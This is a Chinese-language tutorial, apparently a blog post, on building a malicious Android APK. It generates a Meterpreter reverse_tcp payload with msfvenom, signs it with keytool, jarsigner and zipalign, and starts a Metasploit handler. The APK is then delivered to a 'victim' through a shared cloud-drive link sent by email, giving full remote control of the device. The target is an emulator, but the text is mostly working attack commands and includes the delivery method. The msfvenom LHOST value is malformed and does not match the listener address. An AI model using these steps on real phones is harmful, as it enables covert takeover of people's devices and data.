我們需要兩臺虛擬機:Kali Linux和安卓模擬器。
打開vm啟動Kali linux。接著打開終端,使用msfvenom製作android利用程序。
Msfvenom是msfpayload和msfencode的組合。它是一個單一的工具。它有標準的命令行選項。 Msfvenom用來製造的有效載荷用來滲透Android模擬器。
一旦打開終端提示符下輸入以下命令,使用msfvenom工具來創建有效載荷APK文件。
```msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/pentest.apk```p 設置要使用的payloadLHOST 設置用來接收反彈連接的主機LPORT 設置用來接收反彈連接的端口R 設置文件格式Location 要保存的文件位置
這個命令執行完之後,你會看到一些錯誤,但不用擔心。現在可以到輸出目錄查看生成的apk了。
我們已經成功創建了Android格式(APK)文件的有效載荷。現在一般Android的移動設備不允許安裝沒有適當簽名證書的應用程序。 Android設備只安裝帶有簽署文件的APK。
我們可以使用如下工具進行手動簽名:
l Keytool (已安裝)l jar signer (已安裝)l zipalign (需要安裝)執行下列命令簽名。首先使用密鑰工具創建密鑰庫。
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
然後使用JARsigner簽名APK
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`
再用JARsigner驗證簽名
jarsigner -verify -verbose -certs APPNAME.apk
Kali沒有預裝Zipalign,需要先apt-get install zipalign。然後用zipalign來驗證apk。
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk
現在我們有了一個帶有簽名的APK,它可以安裝在任何設備上。
使用Metasploit進行測試
接下來啟動metasploit的監聽器。執行msfconsole打開控制檯。
use exploit/multi/handlerSet PAYLOAD android/meterpreter/reverse_tcpSET LHOST 192.168.152.128SET LPORT 4444Exploit
是時候將惡意的APK發送到手機上。我們這裡使用一個網盤上傳我們的APK,並將下載鏈接分享出去。
這是我們切換到安卓模擬器。
1、從https://code.google.com/archive/p/android-x86/downloads下載android x86的iso。2、使用vmware創建一個內核版本為2.6的虛擬機。3、掛載鏡像,啟動虛擬機。4、進入Live模式。5、設置手機並登陸谷歌帳號。
在安卓模擬器裡面點擊那個鏈接並下載。我們已經發送了一封郵件到受害者的谷歌帳號上。
另外要允許安卓安裝來歷不明的apk。
切換回Kali,我們發現創建了一個新的會話。
然後你就可以為所欲為的操作這臺“手機”了。
閱讀更多 戴丶小莫 的文章
